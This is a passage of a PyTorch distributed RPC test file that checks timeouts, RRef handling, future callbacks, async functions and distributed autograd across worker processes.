# A barrier is needed to ensure that all RPCs are processed.
# Otherwise, some RPCs can time out since the receiving end
# has terminated.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_set_and_get_default_rpc_timeout(self):
timeout = 0.5
# A new `RpcBackendOptions` is constructed
# when accessing `self.rpc_backend_options`.
rpc_backend_options = self.rpc_backend_options
rpc_backend_options.rpc_timeout = timeout
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
set_timeout = rpc.get_rpc_timeout()
self.assertEqual(timeout, set_timeout)
rpc.shutdown()
@dist_init
def test_default_timeout_used(self):
"""
Tests that if no timeout is passed into rpc_async and rpc_sync, then the
default timeout is used.
"""
dst_rank = (self.rank + 1) % self.world_size
rpc._set_rpc_timeout(0.001) # 1 ms
# futures should time out and be marked with an exception indicating the timeout.
futs = [
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=())
for _ in range(10)
]
expected_error = self.get_timeout_error_regex()
for fut in futs:
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# ensure that if a new timeout is set old futures don't time out but new ones do.
rpc._set_rpc_timeout(200) # 200 seconds
# create a longstanding RPC.
fut1 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
# now, set a short timeout.
rpc._set_rpc_timeout(0.001)
# fut2 should time out, fut1 should not.
fut2 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut2.wait()
fut1.wait()
# Zero timeout means infinity, so future should run to completion.
rpc._set_rpc_timeout(0)
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=()).wait()
# reset to default timeout so shutdown messages can process cleanly.
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init
def test_rpc_timeouts(self):
# TODO: enable timeouts for rpc.remote/RRef (https://github.com/pytorch/pytorch/issues/33803)
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
timeout = 0.1 # 100 ms
expected_error = self.get_timeout_error_regex()
# Test async UDF
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,)).wait()
# Test sync UDF
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# If we set a default timeout for RPCs, it should be respected, though
# still overridden if we pass in a different timeout to the APIs.
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# The RPCs should run to completion since we override the timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=5).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)
# Passing in a zero timeout should ensure that the RPC won't time out.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=0)
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
def test_dist_init_decorator(self):
@dist_init(setup_rpc=False)
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
@dist_init
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
def test_use_rpc_pickler(self):
class TestPickler:
pass
test_pickler = TestPickler()
with _use_rpc_pickler(test_pickler):
self.assertTrue(torch.distributed.rpc.api._default_pickler is test_pickler)
self.assertTrue(
torch.distributed.rpc.api._default_pickler is _internal_rpc_pickler
)
@dist_init
def test_wait_all(self):
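# _wait_all tracks every future created inside the block in
# _thread_local_var.future_list and waits on all of them when the context
# exits, after which the thread-local list is removed.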
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
self.assertTrue(len(_thread_local_var.future_list) == 1)
self.assertTrue(isinstance(_thread_local_var.future_list[0], torch._C.Future))
self.assertTrue(fut.done())
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_multiple_call(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
for i in range(20):
fut = rpc.rpc_async(dst, torch.add, (torch.ones(i, i), 1))
res = rpc.rpc_sync(dst, torch.add, (torch.ones(i, i), 1))
self.assertEqual(res, torch.ones(i, i) + 1)
self.assertEqual(fut.wait(), torch.ones(i, i) + 1)
self.assertTrue(len(_thread_local_var.future_list) == 20)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_timeout(self):
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
timeout = 0.1 # 100 ms
fut = rpc.rpc_async(dst, my_sleep_func, args=(1,), timeout=timeout)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_user_func(self):
with self.assertRaises(ValueError):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_body(self):
with self.assertRaises(ValueError):
with _wait_all():
raise_func()
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_function_not_on_callee(self):
# test that if a function does not exist on a callee, we don't crash;
# instead we get an AttributeError indicating that the func does not exist.
this_module = sys.modules[__name__]
caller_worker = "worker0"
callee_worker = "worker1"
if self.rank == 1:
# Use delattr to remove the binding of a func on this node
delattr(this_module, "foo_add")
# notify remote end that we have removed it.
rpc.rpc_sync(caller_worker, set_value, args=(self.rank,))
if self.rank == 0:
# func exists on caller, but not callee.
# wait for remote end to remove the binding of foo_add func.
wait_for_value_future()
# Ensure that we have the attribute on this module. Otherwise, the test could fail due to a caller-side pickling error.
self.assertTrue(hasattr(this_module, "foo_add"))
with self.assertRaisesRegex(
AttributeError, "RPC pickler does not serialize"
):
rpc.rpc_sync(callee_worker, foo_add, args=())
@dist_init
def test_non_garbage_collected_user_rref_due_to_local_circular_dependency(self):
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
a = MyClass(1)
b = MyClass(2)
# This is to make Python not garbage collect a and b.
a.other = b
b.other = a
n = self.rank
a.rref = rpc.remote(
dst_worker_name,
torch.add,
args=(torch.ones(n, n), 2)
)
@dist_init(setup_rpc=False)
def test_use_rref_after_shutdown(self):
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# pass in graceful=True to ensure that local UserRRefs are deleted.
rpc.shutdown(graceful=True)
with self.assertRaisesRegex(
RuntimeError, "Cannot call to_here\\(\\) on it after deletion."
):
rref.to_here()
with self.assertRaisesRegex(
RuntimeError, "Cannot call fork an UserRRef after deletion."
):
import torch.distributed.rpc.internal as internal
internal.serialize(rref)
@staticmethod
def _return_gpu_tensor():
return torch.rand(3, 3).cuda(0)
@staticmethod
def _return_gpu_tensor_list():
return [torch.rand(3, 3).cuda(0), torch.rand(3, 3).cuda(1)]
@staticmethod
def _gpu_tensor_list_arg(tensor_list):
return torch.rand(3, 3)
def _create_rref(self):
owner_rank = (self.rank + 2) % self.world_size
return rpc.remote(
worker_name(owner_rank),
torch.add,
args=(torch.zeros(2, 2), 1)
)
@dist_init
def test_user_rrefs_confirmed(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret = rpc.rpc_sync(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret, True)
@dist_init
def test_user_rrefs_confirmed_remote(self):
dst_rank = (self.rank + 1) % self.world_size
rref = self._create_rref()
ret_rref = rpc.remote(
worker_name(dst_rank),
check_rref_confirmed,
args=(rref,)
)
self.assertEqual(ret_rref.to_here(), True)
@dist_init
def test_rref_py_pickle_not_supported(self):
local_rref = RRef(35)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, "Can not pickle rref in python pickler"):
torch.save(local_rref, fname)
@dist_init
def test_remote_throw(self):
rref = rpc.remote(worker_name((self.rank + 1) % self.world_size),
raise_or_inc,
args=(torch.ones(2),))
with self.assertRaisesRegex(Exception, ".*Expected error.*"):
rref.to_here()
@dist_init
def test_non_cont_tensors(self):
if self.rank == 0:
# Create a non-contiguous tensor.
t = torch.rand(5, 5)
t_view = t.narrow(1, 2, 2)
self.assertFalse(t_view.is_contiguous())
t_cont = t_view.contiguous()
self.assertTrue(t_cont.is_contiguous())
self.assertEqual(t_view, t_cont)
# Send non-cont tensor over RPC.
next_rank = (self.rank + 1) % self.world_size
t_ret = rpc.rpc_sync(worker_name(next_rank), non_cont_test, args=(t_view, t_cont))
# Verify the returned tensor.
self.assertEqual(t_view, t_ret)
self.assertFalse(t_ret.is_contiguous())
@dist_init
def test_callback_simple(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
def callback(fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
set_by_cb.set_result(ret.clone() + 1)
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
self.assertEqual(set_by_cb.result(), torch.ones(n, n) * 2 + 1)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_wrong_arg_num(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_fut = fut.then(my_function)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
with self.assertRaisesRegex(
RuntimeError,
"my\\_function\\(\\) missing 2 required positional arguments"
):
cb_fut.wait()
@dist_init
def test_callback_wrong_arg_type(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut0 = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
fut1 = fut0.then(lambda x: x + 1)
with self.assertRaisesRegex(
RuntimeError,
"unsupported operand type\\(s\\) for \\+"
):
fut1.wait()
@dist_init
def test_callback_multi(self):
num_cbs = 10
n = self.rank + 1
def callback(idx, fut):
ret = fut.wait()
self.assertEqual(ret, torch.ones(n, n) * 2)
return ret + idx
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_futs = []
for idx in range(num_cbs):
cb_futs.append(fut.then(partial(callback, idx)))
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
for idx in range(num_cbs):
self.assertEqual(
cb_futs[idx].wait(),
torch.ones(n, n) * 2 + idx
)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_chain(self):
n = self.rank + 1
dst = worker_name(n % self.world_size)
def callback(fut):
return fut.wait() + 1
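# Each chained callback adds 1 to the previous result, so after num_cbs
# chained `then` calls the final value is the original result plus num_cbs.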
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), 1)
)
num_cbs = 20
for _ in range(num_cbs):
fut = fut.then(callback)
self.assertEqual(fut.wait(), torch.ones(n, n) + 1 + num_cbs)
@dist_init
def test_callback_in_rpc(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
add_use_future_cb,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_callback_with_ret(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
fut2 = rpc.rpc_async(
dst,
torch.add,
args=(fut0.wait(), 1)
).then(lambda fut1: fut1.wait() + 1)
return fut2.wait()
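# The callback issues a nested RPC and waits on its chained future, so fut3
# resolves to torch.ones(2, 2) + 3 (one increment per add/callback step).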
fut3 = rpc.rpc_async(
dst,
torch.add,
args=(torch.ones(2, 2), 1)
).then(callback)
self.assertEqual(fut3.wait(), torch.ones(2, 2) + 3)
@dist_init
def test_callback_with_error(self):
dst = worker_name((self.rank + 1) % self.world_size)
def callback(fut0):
with self.assertRaisesRegex(ValueError, "Expected error"):
fut0.wait()
raise RuntimeError("Another expected error")
fut1 = rpc.rpc_async(dst, raise_func).then(callback)
with self.assertRaisesRegex(RuntimeError, "Another expected error"):
fut1.wait()
@dist_init
def test_callback_none(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
TypeError,
"incompatible function arguments."
):
rpc.rpc_async(dst, raise_func).then(None)
@dist_init
def test_add_done_callback(self):
set_by_cb = False
n = self.rank + 1
def callback(fut):
nonlocal set_by_cb
fut.wait()
set_by_cb = True
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
fut.add_done_callback(callback)
fut_then = fut.then(lambda _: True)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
        # We have no guarantee that the add_done_callback fn will execute before the test finishes.
        # Add a 'then' callback that runs afterwards to guarantee we wait for the first callback.
fut_then.wait()
self.assertTrue(set_by_cb)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_mark_future_twice(self):
fut = rpc.rpc_async(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.zeros(2, 2), 1)
)
self.assertEqual(fut.wait(), torch.zeros(2, 2) + 1)
with self.assertRaisesRegex(
RuntimeError,
"Future can only be marked completed once"
):
fut.set_result(1)
@dist_init
def test_pickle_future(self):
fut = torch.futures.Future()
errMsg = "Can not pickle torch.futures.Future"
dst = worker_name((self.rank + 1) % self.world_size)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_sync(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_async(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.remote(dst, fail_on_fut, args=(fut,))
@dist_init
def test_future_done(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2), 1))
fut.wait()
self.assertTrue(fut.done())
@dist_init
def test_future_done_exception(self):
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
self.assertTrue(fut.done())
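    # Helper: run the given future-callback function on a peer via rpc_sync and check the summed result.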
def _test_future_cb(self, func):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
func,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
@dist_init
def test_future_in_rpc(self):
self._test_future_cb(add_use_future_set_result)
@dist_init
def test_future_nested_callback(self):
self._test_future_cb(add_use_future_nested_cb)
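    # Helper: invoke fn on the destination worker using the requested RPCExecMode (sync, async, or remote).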
def _run_func_in_mode(self, to, fn, mode, args=None, kwargs=None):
if mode == RPCExecMode.SYNC:
return rpc.rpc_sync(to, fn, args=args, kwargs=kwargs)
elif mode == RPCExecMode.ASYNC:
return rpc.rpc_async(to, fn, args=args, kwargs=kwargs).wait()
elif mode == RPCExecMode.REMOTE:
return rpc.remote(to, fn, args=args, kwargs=kwargs).to_here()
def _test_async_function_raise(self, mode):
with self.assertRaisesRegex(RuntimeError, "Expected error"):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_raise_func,
mode
)
@dist_init
def test_async_function_raise(self):
self._test_async_function_raise(RPCExecMode.SYNC)
@dist_init
def test_async_function_raise_async(self):
self._test_async_function_raise(RPCExecMode.ASYNC)
@dist_init
def test_async_function_raise_remote(self):
self._test_async_function_raise(RPCExecMode.REMOTE)
def _test_async_function_wrong_return_type(self, mode):
errMsg = (
"Functions decorated with @rpc\\.async_function must return a "
"torch\\.futures\\.Future object,"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_wrong_type,
mode
)
@dist_init
def test_async_function_wrong_return_type(self):
self._test_async_function_wrong_return_type(RPCExecMode.SYNC)
@dist_init
def test_async_function_wrong_return_type_async(self):
self._test_async_function_wrong_return_type(RPCExecMode.ASYNC)
@dist_init
def test_async_function_wrong_return_type_remote(self):
self._test_async_function_wrong_return_type(RPCExecMode.REMOTE)
@dist_init
def test_async_function_simple(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(dst1, async_add, args=(dst2, torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _test_async_function(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
args = (dst2, torch.ones(2, 2), 1, 2)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + 3)
@dist_init
def test_async_function_with_future_ctor(self):
self._test_async_function(async_add_with_future_ctor)
@dist_init
def test_async_function_with_future_ctor_remote(self):
self._test_async_function(
async_add_with_future_ctor,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_chained(self):
self._test_async_function(async_add_chained)
@dist_init
def test_async_function_chained_remote(self):
self._test_async_function(async_add_chained, RPCExecMode.REMOTE)
@dist_init
def test_async_function_nested(self):
self._test_async_function(async_add_nested)
@dist_init
def test_async_function_nested_remote(self):
self._test_async_function(async_add_nested, RPCExecMode.REMOTE)
@dist_init
def test_async_static_method(self):
self._test_async_function(AsyncExecutionClass.static_async_add)
@dist_init
def test_async_static_method_remote(self):
self._test_async_function(
AsyncExecutionClass.static_async_add,
RPCExecMode.REMOTE
)
@dist_init
def test_async_class_method(self):
self._test_async_function(AsyncExecutionClass.class_async_add)
@dist_init
def test_async_class_method_remote(self):
self._test_async_function(
AsyncExecutionClass.class_async_add,
RPCExecMode.REMOTE
)
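    # Helper: call AsyncExecutionClass's static/class/bound async methods through the rref.rpc_sync(), rpc_async(), and remote() proxies.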
def _test_test_async_class_rref_proxy(self, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
rref = rpc.remote(dst1, AsyncExecutionClass)
x = torch.ones(2, 2)
y = torch.ones(2, 2) + 1
if mode == RPCExecMode.SYNC:
ret = rref.rpc_sync().static_async_add(dst2, x, x, y)
ret += rref.rpc_sync().class_async_add(dst2, x, x, y)
ret += rref.rpc_sync().bound_async_add(dst2, x, x, y)
elif mode == RPCExecMode.ASYNC:
ret = rref.rpc_async().static_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().class_async_add(dst2, x, x, y).wait()
ret += rref.rpc_async().bound_async_add(dst2, x, x, y).wait()
elif mode == RPCExecMode.REMOTE:
ret = rref.remote().static_async_add(dst2, x, x, y).to_here()
ret += rref.remote().class_async_add(dst2, x, x, y).to_here()
ret += rref.remote().bound_async_add(dst2, x, x, y).to_here()
self.assertEqual(ret, 3 * 4 * x)
@dist_init
def test_async_class_rref_proxy(self):
self._test_test_async_class_rref_proxy()
@dist_init
def test_async_class_rref_proxy_async(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.ASYNC)
@dist_init
def test_async_class_rref_proxy_remote(self):
self._test_test_async_class_rref_proxy(mode=RPCExecMode.REMOTE)
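    # Helper for async functions that chain or fan out multiple RPCs; the expected result is ones(2, 2) + num * step.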
def _test_async_function_multi(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
num = 20
step = 3
args = (dst2, torch.ones(2, 2), num, step)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + num * step)
@dist_init
def test_async_function_multi_chained(self):
self._test_async_function_multi(async_add_chained_multi)
@dist_init
def test_async_function_multi_chained_async(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_chained_remote(self):
self._test_async_function_multi(
async_add_chained_multi,
RPCExecMode.REMOTE
)
@dist_init
def test_async_function_multi_fanout(self):
self._test_async_function_multi(async_add_multi_fanout)
@dist_init
def test_async_function_multi_fanout_async(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.ASYNC
)
@dist_init
def test_async_function_multi_fanout_remote(self):
self._test_async_function_multi(
async_add_multi_fanout,
RPCExecMode.REMOTE
)
def _test_return_future(self, mode):
with self.assertRaisesRegex(
RuntimeError,
"Can not pickle torch.futures.Future"
):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
return_future,
mode
)
@dist_init
def test_return_future(self):
self._test_return_future(RPCExecMode.SYNC)
@dist_init
def test_return_future_async(self):
self._test_return_future(RPCExecMode.ASYNC)
@dist_init
def test_return_future_remote(self):
self._test_return_future(RPCExecMode.REMOTE)
@dist_init
def test_rref_timeout(self):
# This test is similar to ones in FaultyProcessGroupTest, but is meant to be
# run with other backends besides ProcessGroup.
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 10 ms timeout
rref = rpc.remote(dst_worker, my_sleep_func, args=(2, ), timeout=0.01)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
wait_until_owners_and_forks_on_rank(1, 1, rank=1)
@dist_init(setup_rpc=False)
@unittest.skipIf(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_pg_then_rpc does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_pg_then_rpc(self):
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init(setup_rpc=False)
@unittest.skipIf(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"init_rpc_then_pg does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
)
def test_init_rpc_then_pg(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
dist.init_process_group(
backend="gloo",
init_method=self.init_method,
rank=self.rank,
world_size=self.world_size,
)
# Test RPC.
next_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test PG
dist.barrier()
rpc.shutdown()
@dist_init
def test_wait_all_with_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init
def test_wait_all_with_partial_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, torch.add, args=(torch.ones(2), 1)))
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init(setup_rpc=False)
@unittest.skipIf(
os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
"Test does not work with TCP init, see https://github.com/pytorch/pytorch/issues/46491",
)
def test_init_rpc_twice(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
# Wait for all init to complete.
dist.barrier()
# Ensure rpc initialization works again.
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# Verify RPCs work after re-init.
dst = worker_name((self.rank + 1) % self.world_size)
rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
rpc.rpc_sync(dst, foo_add, args=())
rpc.shutdown()
def test_wrong_types(self):
with self.assertRaisesRegex(
TypeError,
"Argument backend must be a member of BackendType",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend="TENSORPIPE",
)
with self.assertRaisesRegex(
TypeError,
"Argument rpc_backend_options must be an instance of RpcBackendOptions",
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=self.rpc_backend,
rpc_backend_options={"init_method": self.init_method}
)
def test_cannot_infer_backend_from_options(self):
# An exception should be raised if the backend isn't specified but
# options are given which are not an instance of any of the known
# agents' option classes.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(TypeError, "Could not infer backend for options"):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
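    # rref.backward() on owner RRefs: plain autograd outside a dist_autograd context, context gradients inside one, plus error cases.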
@dist_init
def test_owner_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t1 = torch.rand(10, 10, requires_grad=True)
rref = rpc.RRef(t1.sum() + t1.sum())
rref.backward()
expected_grad = torch.ones_like(t1) * 2
self.assertEqual(expected_grad, t1.grad)
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id)
self.assertEqual(expected_grad, dist_autograd.get_gradients(context_id)[t1])
# Double backward.
with dist_autograd.context() as context_id:
t2 = rpc.rpc_sync(dst, torch.add, args=(t1, t1))
rref = rpc.RRef(t2.sum())
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(expected_grad * 2, dist_autograd.get_gradients(context_id)[t1])
# Test errors.
with self.assertRaisesRegex(RuntimeError, "tensors does not require grad and does not have a grad_fn"):
rpc.RRef(torch.rand(10)).backward()
with self.assertRaisesRegex(RuntimeError, "grad can be implicitly created only for scalar outputs"):
rpc.RRef(torch.rand(10, requires_grad=True)).backward()
with self.assertRaisesRegex(RuntimeError, "Could not find autograd context with id: 100"):
rpc.RRef(torch.rand(10, requires_grad=True).sum()).backward(100)
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rpc.RRef("foo").backward()
@staticmethod
def _sum(x):
return x.sum()
@staticmethod
def _identity(x):
return x
@dist_init
def test_user_rref_backward(self):
dst = worker_name((self.rank + 1) % self.world_size)
t = torch.rand(10, requires_grad=True)
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._sum, args=(t,))
rref.backward(context_id, retain_graph=True)
rref.backward(context_id)
self.assertEqual(torch.ones_like(t) * 2, dist_autograd.get_gradients(context_id)[t])
with dist_autograd.context() as context_id:
rref = rpc.remote(dst, RpcTest._identity, args=("foo",))
with self.assertRaisesRegex(RuntimeError, "RRef should contain a tensor for .backward()"):
rref.backward(context_id)
with self.assertRaisesRegex(RuntimeError, "User RRefs require 'dist_autograd_ctx_id' to be specified"):
rref.backward()
class ProcessGroupAgentRpcTest(RpcAgentTestFixture):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# ProcessGroupRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `ProcessGroupRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.PROCESS_GROUP,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.ProcessGroupRpcBackendOptions(
init_method=self.init_method
)
with self.assertLogs("torch.distributed.rpc", logging.WARNING) as cm:
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
